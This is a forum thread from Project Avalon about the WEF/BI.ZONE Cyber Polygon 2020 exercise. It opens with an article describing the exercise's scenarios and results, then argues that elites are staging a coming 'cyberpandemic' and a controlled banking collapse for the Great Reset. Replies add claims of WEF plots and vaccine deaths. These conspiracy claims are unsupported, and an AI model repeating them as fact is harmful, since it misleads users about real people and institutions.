    The first scenario, called Defence, made the Cyber Polygon participants practice repelling an active APT (advanced persistent threat) cyberattack. The scenario’s objective was stated as being to “develop skills for repelling targeted cyberattacks on a business-critical system.” The simulation’s fictional organization’s virtual infrastructure included a service that processes confidential client information. This service became the subject of interest to an APT group that planned to steal confidential user data and resell it on the “darknet” to financially benefit and damage the company’s reputation. The APT group studied the target system in advance and discovered several critical vulnerabilities. In the scenario, the cyber “gang” plans to attack on the day of the exercise. The participants involved were judged on their ability to cope with the attack as fast as possible, to minimize the amount of information stolen, and to maintain service availability. Blue Team participants could apply any applications and tools to protect the infrastructure and were also allowed to fix system vulnerabilities by improving the service code.

    In the second scenario, called Response, the teams had to investigate the incident using “classic forensics and threat hunting techniques.” Based on the information gathered, participants had to compose a dossier that would help law enforcement agencies locate the criminals. The second scenario’s objective was to develop skills in incident investigation using the scenario in which cybercriminals gained access to a privileged account through a successful phishing attack.

    When the BI.ZONE team released the results of the simulation they intentionally avoided using the real names of the organizations so as not to “set off a competition between the participants and keep their results confidential.” However, the teams could later compare their results with the others by using a basic scoreboard, and the hosts could analyse the crucial data showing various organizational weaknesses of each of the participating teams/institutions.

    The final report states that the results showed that “banks and companies from the IT industry demonstrated the highest resilience. Security assessment expertise in these sectors is quite well developed, with classic forensics and threat hunting widely applied.” In lay terms, the teams from banks and the IT industry seemed to be better prepared than most other sectors for investigating and hunting down threats. However, all the teams involved proved to be less than able when it came to the initial defense from a cyberattack, with the BI.ZONE report stating that “27% of the teams had difficulties earning points for the first scenario, which allows us to conclude that some of the team members lack or have insufficient expertise in security assessment and protection of web applications.” On the subject of threat hunting, the report goes on to say that “21% of the teams could not earn a single point for the second round of the second scenario. This was attributed to ‘Threat Hunting’ being a relatively novel approach and the majority of organisations lacking experience of applying its techniques in practice.”

    The Cyber Polygon 2020 event revealed the weakness in human-led defensive response and resilience as it relates to cyberdefense. This outcome is convenient for hi-tech cybersecurity companies like BI.ZONE that wish to highlight the superiority of AI-driven cybersecurity products in comparison to “inefficient” human workers. Also, it should be noted that BI.ZONE’s gaining knowledge of global institutional weaknesses through cyberdefense training could be useful intelligence for their parent company, Sberbank, and in turn the largest shareholder of Sberbank, the Russian government.
    • Bringing Russia in from the Cold?
    Although Russian Federation authorities are quite used to being out in the cold both politically and physically, there appears to be a change in the usual order of nations. Russia’s inclusion as the leader in such an important global cybersecurity initiative is a bit surprising, especially after Russia has been the scapegoat of choice for any cyberattack committed against any Western power for several years, most recently with the SolarWinds hack in the US. Yet, there was no outcry in the West over Cyber Polygon 2020, in which a company that is majority owned by the Russian government was able to gain direct knowledge of the cyberdefense weaknesses of major global institutions, banks, and corporations through their hosting of the exercise.

    The complete absence of the “Russian hacker” narrative at Cyber Polygon as well as Russia’s leadership role at the event suggests either that a geopolitical shift has taken place or that the Russian hacker narrative commonly deployed by intelligence agencies in the US and Europe is mainly meant for the general public and not for the elite figures and policymakers in attendance at Cyber Polygon.

    Another possibility for Russia no longer being treated as the perpetual enemy of cyberspace is that it is entirely on board with both the official coronavirus narrative and the allegedly imminent cyberpandemic. Cyber Polygon 2020 appeared, in part, to be a Russian charm offensive that was welcomed by the powerful elite. Tony Blair, who once held out the hand of false reconciliation on behalf of the international community to Colonel Gaddafi, has often been involved in these exercises of international diplomacy on behalf of the elites in the years since he left public office. His involvement in the exercise may have been meant to facilitate support among Western WEF-aligned governments for even greater Russian inclusion in the Great Reset. Part of this is due to the WEF-led effort to bring BRICS nations like China and Russia into the Great Reset fold because it is essential for their agenda’s success on a global scale. Now, Russia is pioneering this new model of supposedly national finance systems that the WEF supports through Sberbank’s creation of a digital monopoly not only of financial services but all services within the Russian Federation.

    Cyber Polygon 2020 was both an ad for pro-Russian relations and a promotional exercise for Klaus Schwab and the World Economic Forum’s Great Reset. Some of the people who took part and supported the Cyber Polygon event are involved at the highest levels of cyber intelligence; some may have even been unofficial representatives of their national state intelligence apparatus. The decisions of several national governments to participate directly in the WEF-led Great Reset is no “conspiracy theory.” For instance, the incoming Biden administration sent its climate envoy, John Kerry, to the WEF annual meeting last month, where Kerry underscored the US commitment to the Great Reset agenda and the associated Fourth Industrial Revolution that seeks to automate most jobs being currently performed by humans. With the governments of Russia, China, the US, the UK, Israel, Canada, and India, among others, on board with this transnational agenda, it becomes deeply unsettling that high-ranking operatives in both the public and private sectors joined the WEF to conduct a simulation of a crisis that would clearly benefit the Great Reset agenda.
    As previously mentioned, the WEF cosponsored a simulation of a coronavirus pandemic just months before the actual event. Soon after the COVID-19 crisis began in earnest last March, Schwab noted that the pandemic crisis was just what was needed to launch the Great Reset as it served as a convenient catalyst to begin overhauling economies, governance, and social society on a global scale. If the destabilizing events simulated at Cyber Polygon do come to pass, it will likely be similarly welcomed by the WEF, given that a critical failure in the current global financial system would allow the introduction of new public-private “digital ecosystem” monopolies such as those being built in Russia by Sberbank.

    This effort by Sberbank to both digitize and monopolize access to all services, both private and public, may be appealing to some because of its apparent convenience. However, it will also be emblematic of what we can expect from Schwab’s Great Reset—monopolies of fused public- and private-sector entities disguised by the term “stakeholder capitalism.” What the general public does not realize yet is that they themselves will not be included among these “stakeholders,” as the Great Reset has been designed by the bankers and wealthy elite for the bankers and the wealthy elite.

    As for the Cyber Polygon 2020 event, the coming cyberpandemic is being prophetically thrown in our faces just as the pandemic exercise was prior to the actual disease’s appearance. Such prophetic warnings are coming not only from the WEF, however. For instance, the head of Israel’s National Cyber Directorate, Yigal Unna, warned last year that a “cyber winter” of cyberattacks “is coming and coming faster than even I suspected.” In the cyber directorate, Unna works closely with Israeli intelligence agencies, including the infamous Unit 8200, which has a long history of electronic espionage targeting the US and other countries and which has been responsible for several devastating hacks, including the Stuxnet virus that damaged Iran’s nuclear program. Israeli intelligence is also poised to be among the greatest beneficiaries of the Great Reset due to the strength of the nation’s hi-tech sector. In addition, last month saw the UAE’s central bank following Cyber Polygon’s lead by conducting its first-ever cyberattack simulation in coordination with the Emirati private-finance sector. Corporate media outlets, for their part, began this year by claiming that “cyberattacks may trigger the next crisis for banks” and, as of February 1, that “the next cyberattack is already underway.”

    Some will say that a “cyberpandemic” is an inevitable consequence of the quickly developing hi-tech world in which we live, but it is still fair to point out that 2021 is the year that many have been predicting for the financial destruction of big institutions that will lead to new economic systems that align with the Great Reset. The inevitable collapse of the global banking system, resulting from the off-the-charts corruption and fraud that has run rampant for decades, is likely to be conducted through a controlled collapse, one that would allow wealthy bankers and elites, such as those that participated in Cyber Polygon, to avoid responsibility for their economic pillaging and criminal activity.

    This is especially true for Cyber Polygon participant Deutsche Bank, whose inevitable collapse has been openly discussed for years due to the bank’s extreme corruption, fraud, and massive exposure to derivatives. In late 2019, months before the COVID-19 crisis began, the CEO of Deutsche Bank warned that central banks no longer had tools that could adequately respond to the next “economic crisis.” It is certainly telling that entirely new banking systems, such as Sberbank’s soon-to-be-launched digital monetary monopoly, began to be developed just as it began to be publicly acknowledged that central banks’ traditional means of responding to economic calamities were no longer viable.

    A massive cyberattack, such as that simulated at Cyber Polygon 2020, would allow faceless hackers to be blamed for economic collapse, thus absolving the real financial criminals of responsibility. Furthermore, due to the difficult nature of investigating hacks and the ability of intelligence agencies to frame other nation states for hacks they in fact committed themselves, any boogeyman of choice can be blamed, whether a “domestic terror” group or a country unaligned with the WEF (for now, at least) like Iran or North Korea. Between the well-placed warnings, simulations, and the clear benefit for the global elite intent on a Great Reset, Cyber Polygon 2020 appears to have served not only its publicly stated purpose but its own ulterior motives.
    Last edited by ExomatrixTV; 8th June 2021 at 18:17.
    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...


  23. Link to Post #12
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,586
    Thanks
    30,552
    Thanked 124,906 times in 20,684 posts

    Default Re: WEF planning cyber attack on financial system?



  25. Link to Post #13
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,586
    Thanks
    30,552
    Thanked 124,906 times in 20,684 posts

    Exclamation Re: WEF planning cyber attack on financial system?

    • "Next Crisis Bigger than COVID" - Power Grid/Finance Down - WEF's Cyber Polygon:

    Source: https://www.bitchute.com/video/7jdzaIvviv0x
    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

  26. The Following 9 Users Say Thank You to ExomatrixTV For This Post:

    All is one (10th July 2021), Bill Ryan (10th July 2021), Franny (10th June 2021), Gekko (8th June 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), mountain_jim (8th June 2021), Peace in Oz (10th June 2021), Tintin (8th June 2021)

  27. Link to Post #14
    United States Moderator Sue (Ayt)'s Avatar
    Join Date
    23rd December 2016
    Language
    English
    Posts
    2,546
    Thanks
    28,217
    Thanked 20,478 times in 2,544 posts

    Default Re: WEF planning cyber attack on financial system?

    The whole scenario sure is heating up this week in mainstream news!

    "Biden confronted Putin about cyber attacks by Russia-based actors during the Geneva summit. And earlier this week, Psaki said the White House has conveyed to Russian officials that there is a responsibility to respond after recent cyber attacks and that the US stands ready to "take action" if necessary."
    https://www.cnn.com/2021/07/09/polit...are/index.html

    As Gwin Ru posted in the depopulation thread, it is this weekend that the WEF is holding its Operation Cyber Polygon exercise.

    Source: https://www.rumble.com/video/vh0t77/?pub=njjqz

    The World Economic Forum Executive and his evil cohorts are meeting this weekend to 'war game' their next plot against freedom-loving global citizens as part of their attempt to CRUSH YOU and reign over every living being.

    www.StewPeters.tv | DeAnnaLorraine.com
    "We're all bozos on this bus"

  28. The Following 8 Users Say Thank You to Sue (Ayt) For This Post:

    All is one (10th July 2021), Bill Ryan (10th July 2021), Eva2 (10th July 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), mountain_jim (10th July 2021), Sunny (10th July 2021), Tintin (10th July 2021)

  29. Link to Post #15
    Belgium Avalon Member All is one's Avatar
    Join Date
    25th June 2021
    Language
    Dutch
    Age
    41
    Posts
    181
    Thanks
    882
    Thanked 1,144 times in 169 posts

    Default Re: WEF planning cyber attack on financial system?

    I’m wondering if all of this could be happening any time soon; what the best way would be to keep in contact & keep each other up to date with relevant info.

    I’ve seen many alternative info sites returning to newsletter and email lists …

    Would it be a good idea/possible to do something similar for the Avalon community?

  30. The Following 7 Users Say Thank You to All is one For This Post:

    Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), Johan (Keyholder) (11th July 2021), mountain_jim (10th July 2021), Sunny (10th July 2021), Tintin (10th July 2021)

  31. Link to Post #16
    UK Avalon Founder Bill Ryan's Avatar
    Join Date
    7th February 2010
    Location
    Ecuador
    Posts
    34,206
    Thanks
    207,996
    Thanked 456,558 times in 32,726 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by All is one (here)
    I’m wondering if all of this could be happening any time soon; what the best way would be to keep in contact & keep each other up to date with relevant info.

    I’ve seen many alternative info sites returning to newsletter and email lists …

    Would it be a good idea/possible to do something similar for the Avalon community?
    We do have all the Avalon members' emails archived.*

    If the site goes offline ** or is somehow inaccessible, the mods and I would be sure to contact every member by email. I don't think this will happen — but if it does, we can take it from there with a proactive plan about how best to all keep in touch and be informed.

    ~~~
    * Please DO make sure the email address we have for you is active and up to date. You can update your email address easily via your personal settings page, here: https://projectavalon.net/forum4/pro...o=editpassword

    ** We have a double backup (a duplicated additional system), which we announced here. So even if our main host goes offline, we do have an independent backup on a different continent with a different host.



  32. The Following 18 Users Say Thank You to Bill Ryan For This Post:

    Adi (10th July 2021), All is one (11th July 2021), BMJ (19th July 2021), Brodie75 (11th July 2021), ByTheNorthernSea (10th July 2021), edina (10th July 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), I am B (12th July 2021), kudzy (11th July 2021), mab777 (11th July 2021), meat suit (10th July 2021), mountain_jim (10th July 2021), Peace in Oz (12th July 2021), Sirus (10th July 2021), Tintin (10th July 2021), wegge (10th July 2021), Yoda (10th July 2021)

  33. Link to Post #17
    United States Moderator Sue (Ayt)'s Avatar
    Join Date
    23rd December 2016
    Language
    English
    Posts
    2,546
    Thanks
    28,217
    Thanked 20,478 times in 2,544 posts

    Default Re: WEF planning cyber attack on financial system?

    The WEF has its own YouTube channel.
    Here is one video it put out in January:
    "We're all bozos on this bus"

  34. The Following 7 Users Say Thank You to Sue (Ayt) For This Post:

    Alecs (11th July 2021), avid (12th July 2021), Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), mountain_jim (10th July 2021), Tintin (10th July 2021)

  35. Link to Post #18
    On Sabbatical
    Join Date
    26th September 2019
    Language
    None
    Posts
    3,411
    Thanks
    10,548
    Thanked 27,825 times in 3,335 posts

    Default Re: WEF planning cyber attack on financial system?

    He says that, but internally does nothing about it, as Putin requested, why is the US not sending notifications about the hacks? Or truly reporting them to Russia, at all?

    It's almost like they don't want Russia to look deeply into the hack, and that makes it very suspicious.

    Walk the talk? The US gov doesn't want to. It's a media show only for domestic consumption.

    Quote Posted by Sue (Ayt) (here)
    The whole scenario sure is heating up this week in mainstream news!

    "Biden confronted Putin about cyber attacks by Russia-based actors during the Geneva summit. And earlier this week, Psaki said the White House has conveyed to Russian officials that there is a responsibility to respond after recent cyber attacks and that the US stands ready to "take action" if necessary."
    https://www.cnn.com/2021/07/09/polit...are/index.html

    As Gwin Ru posted in the depopulation thread, it is this weekend that the WEF is holding its Operation Cyber Polygon exercise.

    Source: https://www.rumble.com/video/vh0t77/?pub=njjqz

    The World Economic Forum Executive and his evil cohorts are meeting this weekend to 'war game' their next plot against freedom-loving global citizens as part of their attempt to CRUSH YOU and reign over every living being.

    www.StewPeters.tv | DeAnnaLorraine.com
    Last edited by Mashika; 10th July 2021 at 21:02.
    Tired

  36. The Following 6 Users Say Thank You to Mashika For This Post:

    Alecs (11th July 2021), Bill Ryan (10th July 2021), Harmony (12th July 2021), mountain_jim (12th July 2021), Sue (Ayt) (10th July 2021), Tintin (10th July 2021)

  37. Link to Post #19
    Avalon Member Andre's Avatar
    Join Date
    9th July 2010
    Location
    Byron Bay Area
    Language
    English
    Posts
    473
    Thanks
    342
    Thanked 2,518 times in 441 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by Bill Ryan (here)
    Quote Posted by All is one (here)
    I’m wondering if all of this could be happening any time soon; what the best way would be to keep in contact & keep each other up to date with relevant info. I’ve seen many alternative info sites returning to newsletter and email lists … Would it be a good idea/possible to do something similar for the Avalon community?
    We do have all the Avalon members' emails archived.*

    If the site goes offline ** or is somehow inaccessible, the mods and I would be sure to contact every member by email. I don't think this will happen — but if it does, we can take it from there with a proactive plan about how best to all keep in touch and be informed.
    * Please DO make sure the email address we have for you is active and up to date. You can update your email address easily via your personal settings page, here: https://projectavalon.net/forum4/pro...o=editpassword

    ** We have a double backup (a duplicated additional system), which we announced here. So even if our main host goes offline, we do have an independent backup on a different continent with a different host.
    I guess a lot depends on the WEF's attack vector, but if they try to take down the entire internet to do a "great reset", I doubt that email will be accessible. Perhaps the real meaning of the term "great reset" is, in fact, the reset/reboot of the internet itself.

    Off the top of my head, I would guess their main attack target is really the financial sector which many have surmised cannot continue much longer in its present form. This talk of bringing down hospital systems and so forth may be a smokescreen for that and the "reset" will bring in their digital currency platforms. Anyway, just speculation on my part. But perhaps we'll have to resort to fax machines and ham radio if they do bring the whole thing down!
    Last edited by Andre; 12th July 2021 at 09:05.
    Our destiny is in our hands. Let us visualise a world of truth, freedom and equality.

  38. The Following 3 Users Say Thank You to Andre For This Post:

    Harmony (12th July 2021), I am B (12th July 2021), mountain_jim (12th July 2021)

  39. Link to Post #20
    Avalon Member I am B's Avatar
    Join Date
    20th January 2021
    Posts
    339
    Thanks
    1,619
    Thanked 3,000 times in 335 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by Sue (Ayt) (here)
    The WEF has its own YouTube channel.
    Here is one video it put out in January:
    Throwing around some speculation, close to the lines of what Andre said. What may be the objective of the cyberthreats story now?

    - Internet "redesign", with no more Avalon, and even less (if any already) freedom of speech.
    or
    - Internet shutdown to keep everybody close and uncommunicated. Although with the existing alternative analogical communication methods I highly doubt it. The point of this would be to have it done intermittently.

    - Yet another excuse for economical collapse and food shortages. A final blow on healthcare and economy.

    - Or both

    As far as I know, a huge part of the internet is on a "few" computers from Amazon and Google. When people start dying from the vaccine, they can just shut down parts of it, AND still look like heroes for fighting such attacks, as the video says, just like WHO with covid. And we know very well WHO and Big tech are well together since the beginning.

    On the other hand, right now, if Google was shut down in any country, there would likely be revolts and huge unrest, with added economical damage. If big tech gets an excuse to "randomly" shut down any country's internet without being liable for it, they would factually be holding the whole world from the balls.

    I wouldn't take such a video for granted. It's from marketing basics to use the fame created by the last successful project to push the next one. And it was a HUGE project, so it wouldn't be used if it was not going all the way through.

    I find it more important than ever to create some alternative out of the grid communication platform. I'm sure there's plenty of people here able to do so and some threads on it already.

  40. The Following 3 Users Say Thank You to I am B For This Post:

    amor (2nd March 2022), ExomatrixTV (15th December 2023), Harmony (22nd July 2021)
